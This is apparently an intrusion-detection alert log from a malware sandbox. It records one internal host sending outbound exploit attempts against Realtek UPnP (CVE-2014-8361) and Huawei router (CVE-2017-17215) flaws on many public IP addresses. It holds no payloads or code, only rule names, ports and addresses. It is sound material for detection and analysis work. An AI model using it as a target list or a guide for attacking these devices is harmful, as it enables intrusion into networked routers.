                                                07/20/24-23:05:35.571697TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615941852869192.168.2.14153.91.158.250
                                                07/20/24-23:06:03.002504TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3811852869192.168.2.14100.254.105.120
                                                07/20/24-23:05:48.787750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766237215192.168.2.14197.249.199.219
                                                07/20/24-23:05:57.173548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613620652869192.168.2.14197.17.84.0
                                                07/20/24-23:05:40.330643TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25210252869192.168.2.1475.119.92.151
                                                07/20/24-23:06:03.015672TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23939652869192.168.2.1472.33.167.45
                                                07/20/24-23:05:38.801468TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4447652869192.168.2.14108.67.27.88
                                                07/20/24-23:07:03.123324TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614245652869192.168.2.1497.184.161.137
                                                07/20/24-23:05:44.721858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4203652869192.168.2.14190.251.113.36
                                                07/20/24-23:05:58.981798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4484652869192.168.2.14131.2.104.94
                                                07/20/24-23:06:25.528399TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3937052869192.168.2.14106.241.46.107
                                                07/20/24-23:05:34.662485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3344237215192.168.2.1441.212.223.17
                                                07/20/24-23:05:40.330485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5342052869192.168.2.1412.251.167.176
                                                07/20/24-23:05:57.004757TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616012252869192.168.2.148.115.28.187
                                                07/20/24-23:06:01.903540TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3510252869192.168.2.1488.157.23.181
                                                07/20/24-23:05:57.227564TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4306452869192.168.2.1458.185.111.115
                                                07/20/24-23:05:40.413313TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25563252869192.168.2.1473.43.58.179
                                                07/20/24-23:06:06.299139TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23889852869192.168.2.1486.158.137.16
                                                07/20/24-23:06:38.067768TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25076452869192.168.2.14159.56.50.124
                                                07/20/24-23:05:37.474845TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24279652869192.168.2.14112.153.191.145
                                                07/20/24-23:06:34.302136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5899452869192.168.2.14208.101.156.156
                                                07/20/24-23:06:18.420371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5570452869192.168.2.1437.12.109.244
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893837215192.168.2.1441.104.121.61
                                                07/20/24-23:07:08.060226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3461652869192.168.2.1454.107.221.135
                                                07/20/24-23:05:38.548040TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613307452869192.168.2.14166.187.21.85
                                                07/20/24-23:05:42.188277TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3919437215192.168.2.1441.94.86.182
                                                07/20/24-23:05:50.522256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435037215192.168.2.14197.108.94.31
                                                07/20/24-23:05:40.338978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3739252869192.168.2.1445.131.99.6
                                                07/20/24-23:06:01.831222TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4873052869192.168.2.14191.99.26.134
                                                07/20/24-23:05:40.377377TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25111052869192.168.2.1467.38.12.24
                                                07/20/24-23:05:52.502843TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25191052869192.168.2.14197.133.121.224
                                                07/20/24-23:06:01.093345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5303252869192.168.2.1459.108.150.126
                                                07/20/24-23:05:55.858612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3998437215192.168.2.1441.69.233.87
                                                07/20/24-23:06:29.102034TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4613452869192.168.2.1448.217.112.115
                                                07/20/24-23:05:34.625707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566437215192.168.2.14208.191.39.47
                                                07/20/24-23:06:14.686896TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4957652869192.168.2.1498.16.115.167
                                                07/20/24-23:06:16.055924TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4661252869192.168.2.14190.92.200.248
                                                07/20/24-23:05:52.515827TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25883052869192.168.2.14139.162.45.48
                                                07/20/24-23:06:53.291407TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23808452869192.168.2.14139.245.84.27
                                                07/20/24-23:05:59.805275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5595852869192.168.2.14159.239.108.10
                                                07/20/24-23:06:29.032977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4553252869192.168.2.1481.227.7.243
                                                07/20/24-23:05:48.020423TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614788252869192.168.2.1499.123.61.15
                                                07/20/24-23:06:08.320378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614773252869192.168.2.14198.60.250.215
                                                07/20/24-23:06:39.471724TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26097252869192.168.2.1497.122.27.131
                                                07/20/24-23:05:47.182639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4082852869192.168.2.1486.169.138.209
                                                07/20/24-23:05:34.659618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4475437215192.168.2.14167.133.59.154
                                                07/20/24-23:06:16.186287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4706252869192.168.2.14102.178.124.219
                                                07/20/24-23:05:45.386529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669037215192.168.2.14119.97.29.0
                                                07/20/24-23:06:00.673228TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4943652869192.168.2.14110.201.72.125
                                                07/20/24-23:06:15.236295TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24913252869192.168.2.1437.117.94.187
                                                07/20/24-23:06:06.437928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4217452869192.168.2.14132.11.86.47
                                                07/20/24-23:05:47.709520TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5898852869192.168.2.14174.19.138.99
                                                07/20/24-23:06:08.356049TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614138452869192.168.2.1417.167.26.145
                                                07/20/24-23:05:36.037160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615230452869192.168.2.14168.85.33.243
                                                07/20/24-23:05:40.483611TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26045852869192.168.2.1461.50.146.33
                                                07/20/24-23:05:38.780537TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614620852869192.168.2.14153.164.18.4
                                                07/20/24-23:05:57.200464TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5487452869192.168.2.1454.23.238.110
                                                07/20/24-23:06:14.641445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24018052869192.168.2.1499.220.176.209
                                                07/20/24-23:06:26.022416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25635652869192.168.2.14113.70.115.254
                                                07/20/24-23:05:35.482812TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5074052869192.168.2.14105.87.255.111
                                                07/20/24-23:05:37.446803TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5005052869192.168.2.14125.97.107.120
                                                07/20/24-23:05:38.971654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947837215192.168.2.14157.149.243.19
                                                07/20/24-23:06:27.562825TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4173852869192.168.2.14171.33.218.139
                                                07/20/24-23:05:35.184596TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4992252869192.168.2.1451.156.205.139
                                                07/20/24-23:05:47.044038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004437215192.168.2.1436.148.155.222
                                                07/20/24-23:05:40.330485TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25342052869192.168.2.1412.251.167.176
                                                07/20/24-23:05:50.501247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3722037215192.168.2.1441.212.71.79
                                                07/20/24-23:05:57.032993TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26099452869192.168.2.14223.229.22.78
                                                07/20/24-23:06:23.088978TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615142252869192.168.2.14207.237.205.173
                                                07/20/24-23:05:37.472951TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23912452869192.168.2.14150.186.198.246
                                                07/20/24-23:06:01.813206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24922052869192.168.2.1478.254.150.241
                                                07/20/24-23:06:20.681117TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614966052869192.168.2.1459.30.21.146
                                                07/20/24-23:05:44.721858TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3560452869192.168.2.14212.82.101.165
                                                07/20/24-23:05:47.103906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940037215192.168.2.14157.43.113.62
                                                07/20/24-23:06:05.233952TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615805852869192.168.2.14176.50.156.26
                                                07/20/24-23:06:06.458215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4822452869192.168.2.1480.41.81.201
                                                07/20/24-23:05:39.517577TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615069052869192.168.2.14117.40.50.228
                                                07/20/24-23:05:52.466707TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4903052869192.168.2.14161.61.246.176
                                                07/20/24-23:05:45.424850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946237215192.168.2.1457.27.32.62
                                                07/20/24-23:05:37.470289TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24267852869192.168.2.14107.226.165.86
                                                07/20/24-23:06:12.572216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6030652869192.168.2.14179.20.228.12
                                                07/20/24-23:05:35.289186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4479252869192.168.2.1459.10.142.189
                                                07/20/24-23:05:45.435097TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135437215192.168.2.14157.74.46.113
                                                07/20/24-23:05:52.515632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24529852869192.168.2.1494.25.11.127
                                                07/20/24-23:05:52.570741TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23283052869192.168.2.14174.19.138.99
                                                07/20/24-23:06:53.548834TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5118252869192.168.2.1482.229.75.23
                                                07/20/24-23:06:11.328788TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5476652869192.168.2.14155.131.182.139
                                                07/20/24-23:06:01.464393TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615316052869192.168.2.1472.144.78.222
                                                07/20/24-23:06:31.001861TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6043452869192.168.2.1471.158.18.236
                                                07/20/24-23:06:00.257590TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3693852869192.168.2.14147.248.169.35
                                                07/20/24-23:05:45.304282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615435652869192.168.2.1495.213.237.81
                                                07/20/24-23:06:11.202361TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614754252869192.168.2.14222.179.154.42
                                                07/20/24-23:05:56.227561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538852869192.168.2.14163.139.96.29
                                                07/20/24-23:05:36.339999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4005637215192.168.2.14197.47.5.182
                                                07/20/24-23:05:59.106017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615757452869192.168.2.1452.242.228.39
                                                07/20/24-23:05:42.127943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206637215192.168.2.14156.155.255.188
                                                07/20/24-23:05:39.469355TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4427852869192.168.2.1412.129.231.129
                                                07/20/24-23:05:36.028871TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5947652869192.168.2.14175.166.165.48
                                                07/20/24-23:06:35.309569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6075652869192.168.2.1414.217.3.16
                                                07/20/24-23:06:14.957724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614899652869192.168.2.14196.158.220.11
                                                07/20/24-23:06:23.359635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3808652869192.168.2.1471.91.216.235
                                                07/20/24-23:05:36.361899TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613937252869192.168.2.1498.139.133.85
                                                07/20/24-23:05:50.554912TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071637215192.168.2.14119.222.92.11
                                                07/20/24-23:05:34.626588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4370437215192.168.2.14197.213.57.205
                                                07/20/24-23:05:39.025518TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615797852869192.168.2.1413.60.62.114
                                                07/20/24-23:05:36.329793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3634237215192.168.2.14213.181.91.168
                                                07/20/24-23:05:39.035942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3749237215192.168.2.1441.214.2.194
                                                07/20/24-23:05:40.355766TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3993652869192.168.2.14119.64.194.144
                                                07/20/24-23:05:38.501893TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497852869192.168.2.14192.79.124.241
                                                07/20/24-23:05:57.187455TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6067052869192.168.2.14208.177.199.121
                                                07/20/24-23:05:57.971515TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23505452869192.168.2.1487.182.203.169
                                                07/20/24-23:06:03.480553TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5613652869192.168.2.14163.106.60.149
                                                07/20/24-23:05:57.204945TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3504852869192.168.2.1459.29.225.212
                                                07/20/24-23:06:13.684507TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4486452869192.168.2.14137.55.138.211
                                                07/20/24-23:05:37.549791TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5178852869192.168.2.14182.202.245.171
                                                07/20/24-23:06:43.392497TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24064652869192.168.2.1462.176.218.93
                                                07/20/24-23:05:52.572723TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5273852869192.168.2.14213.79.125.242
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133437215192.168.2.1441.112.53.44
                                                07/20/24-23:05:57.549014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3345652869192.168.2.14170.62.212.33
                                                07/20/24-23:05:58.415863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3391852869192.168.2.14209.62.86.250
                                                07/20/24-23:05:44.327630TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25742652869192.168.2.141.57.80.92
                                                07/20/24-23:05:57.546626TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25071652869192.168.2.1469.166.16.198
                                                07/20/24-23:06:15.036059TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5626452869192.168.2.1492.139.58.126
                                                07/20/24-23:05:57.906796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5861452869192.168.2.14148.241.191.50
                                                07/20/24-23:06:20.550859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4360452869192.168.2.14129.36.77.36
                                                07/20/24-23:06:00.145339TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23659252869192.168.2.14148.192.90.183
                                                07/20/24-23:05:56.234699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5786237215192.168.2.14189.19.255.237
                                                07/20/24-23:06:16.584797TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615638452869192.168.2.14183.52.83.104
                                                07/20/24-23:05:38.530661TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615831652869192.168.2.14157.254.149.171
                                                07/20/24-23:05:40.407056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25409252869192.168.2.14116.197.2.184
                                                07/20/24-23:05:56.066947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4283037215192.168.2.14197.154.98.206
                                                07/20/24-23:05:45.728529TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613350252869192.168.2.14101.8.57.23
                                                07/20/24-23:06:15.366643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5852252869192.168.2.14216.57.237.73
                                                07/20/24-23:05:39.047547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885837215192.168.2.14157.161.23.127
                                                07/20/24-23:05:44.929116TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4658052869192.168.2.1431.172.196.201
                                                07/20/24-23:06:14.686896TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614098052869192.168.2.14192.15.83.19
                                                07/20/24-23:05:57.159681TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614674052869192.168.2.14110.237.107.43
                                                07/20/24-23:06:02.938370TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613877652869192.168.2.14203.213.32.135
                                                07/20/24-23:06:51.585302TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614499652869192.168.2.14208.32.105.243
                                                07/20/24-23:05:35.253230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4843252869192.168.2.1451.192.83.103
                                                07/20/24-23:05:38.950380TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3523837215192.168.2.14107.0.213.50
                                                07/20/24-23:06:22.925505TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614840252869192.168.2.14188.110.171.215
                                                07/20/24-23:05:34.624854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4586437215192.168.2.14197.27.127.22
                                                07/20/24-23:05:35.523772TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4261452869192.168.2.14145.82.197.86
                                                07/20/24-23:05:39.050437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5419637215192.168.2.1441.6.65.49
                                                07/20/24-23:06:07.044272TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24262052869192.168.2.14212.79.198.77
                                                07/20/24-23:05:36.328888TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558237215192.168.2.14157.185.198.1
                                                07/20/24-23:05:40.433285TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5206452869192.168.2.1424.4.155.46
                                                07/20/24-23:05:40.361541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4571452869192.168.2.1412.129.231.129
                                                07/20/24-23:05:57.136226TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25287052869192.168.2.14105.54.61.6
                                                07/20/24-23:06:19.491493TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25794452869192.168.2.1470.60.168.25
                                                07/20/24-23:05:58.884219TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4186452869192.168.2.1440.70.128.177
                                                07/20/24-23:06:01.467143TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4669452869192.168.2.14191.99.77.22
                                                07/20/24-23:06:40.199749TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615078452869192.168.2.14197.174.120.97
                                                07/20/24-23:06:15.236295TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25866852869192.168.2.14191.54.159.112
                                                07/20/24-23:06:23.088978TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5142252869192.168.2.14207.237.205.173
                                                07/20/24-23:05:33.861759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4630037215192.168.2.14157.14.16.110
                                                07/20/24-23:06:00.435146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4688652869192.168.2.14144.194.126.32
                                                07/20/24-23:06:01.170267TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24353052869192.168.2.1419.25.67.71
                                                07/20/24-23:06:23.035057TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615861652869192.168.2.1488.208.37.173
                                                07/20/24-23:05:58.549030TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614483652869192.168.2.1423.1.60.167
                                                07/20/24-23:05:59.330840TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25865652869192.168.2.14183.146.251.234
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288437215192.168.2.14197.236.154.168
                                                07/20/24-23:06:11.138961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4959452869192.168.2.142.225.107.63
                                                07/20/24-23:05:38.216515TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613580052869192.168.2.1450.3.84.134
                                                07/20/24-23:05:38.951134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313437215192.168.2.14101.158.73.28
                                                07/20/24-23:05:45.376608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536237215192.168.2.1417.163.72.239
                                                07/20/24-23:05:46.815988TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5737452869192.168.2.14144.116.128.187
                                                07/20/24-23:07:27.665768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5210052869192.168.2.14204.45.41.209
                                                07/20/24-23:05:36.352367TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613901052869192.168.2.14197.23.60.58
                                                07/20/24-23:05:57.273333TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24006052869192.168.2.14143.90.94.100
                                                07/20/24-23:06:00.005301TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614979852869192.168.2.14106.217.170.66
                                                07/20/24-23:07:36.644546TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5331852869192.168.2.14110.206.40.7
                                                07/20/24-23:06:16.139087TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23332652869192.168.2.14176.120.158.229
                                                07/20/24-23:05:35.857672TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3967252869192.168.2.14111.8.128.237
                                                07/20/24-23:05:37.449834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24408052869192.168.2.14145.82.197.86
